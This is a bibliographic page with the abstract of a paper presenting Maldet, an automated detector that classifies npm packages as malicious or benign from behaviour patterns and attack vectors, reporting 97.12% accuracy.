Go to DBLP homepageMaldet: An Automated Malicious npm Package Detector Based on Behavior Characteristics and Attack Vectors
Abstract: With the growing number of software developments and the expansion of functionalities, more and more developers tend to use third-party packages to speed up development and improve efficiency. Due to the openness of npm and the widespread use of Node.js, npm has become the largest open source software ecosystem and therefore a prime target for malicious attackers. Attackers often use various attack vectors to release new malicious packages or destroy existing benign packages, thus posing threats to software that rely on these packages. Therefore, detecting malicious npm packages is of great significance for protecting user security and building a more reliable and secure npm open source software ecosystem.We propose Maldet, an automated malicious npm package detection method. Maldet uses the malicious behavior pattern library we have built as features, training known malicious and benign samples with four different classifiers. In addition, we use a supplementary detector to perform a secondary detect on packages that detected benign, thereby reducing the number of false negatives. The results show that Maldet can detect each package in an average of just a few seconds with 97.12% accuracy, which is superior to other tools, providing high accuracy and fast classification capability.
Loading